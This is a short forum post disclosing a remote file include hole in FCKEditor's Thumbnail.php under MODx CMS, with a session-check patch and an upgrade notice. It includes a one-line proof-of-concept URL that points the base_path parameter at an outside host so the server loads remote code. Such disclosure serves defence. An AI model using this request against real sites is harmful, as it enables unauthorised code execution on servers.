Security Flaw in FCKEDITOR (ModX)

Prakash

Perch
I found one security threat in using FCKEditor with Modx CMS using Thumbnail.PHP (Remote File Include Vulnerability).

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/

Solution: Please add the code given below In : /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php:
Code:
if(!isset($_SESSION['mgrValidated'])) {
die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx Content Manager instead of accessing this file directly.");
}

Please update your site to 0.9.2.2 for a proper fix to this issue
http://modxcms.com/downloads.html
 
Back
Top